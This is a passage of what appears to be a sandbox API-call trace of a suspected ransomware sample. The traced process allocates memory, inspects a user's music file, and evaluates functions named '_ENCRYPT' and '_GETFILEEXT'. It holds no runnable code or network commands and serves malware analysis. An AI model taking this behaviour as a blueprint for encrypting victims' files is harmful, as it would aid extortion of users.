(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=46, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5c) returned 0x9a5de0 [0188.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=46, lpWideCharStr=0x9a5de0, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3") returned 46 [0188.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0188.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0188.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0188.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0188.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0188.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0188.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0188.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0188.280] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0188.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.282] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.282] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.282] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0188.282] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.282] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.283] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.283] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.283] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.283] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.283] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.283] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0188.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0188.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.284] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.284] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.284] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.284] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b94ad0, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x17c989e0, ftLastAccessTime.dwHighDateTime=0x1d5da3a, ftLastWriteTime.dwLowDateTime=0x17c989e0, ftLastWriteTime.dwHighDateTime=0x1d5da3a, nFileSizeHigh=0x0, nFileSizeLow=0x4bb8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="xhgr3.mp3", cAlternateFileName="")) returned 0x90add8 [0188.284] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0188.285] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b94ad0, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x17c989e0, ftLastAccessTime.dwHighDateTime=0x1d5da3a, ftLastWriteTime.dwLowDateTime=0x17c989e0, ftLastWriteTime.dwHighDateTime=0x1d5da3a, nFileSizeHigh=0x0, nFileSizeLow=0x4bb8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="xhgr3.mp3", cAlternateFileName="")) returned 0x90add8 [0188.286] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.286] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xhgr3.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.288] HeapFree (in: hHeap=0x8a0000, 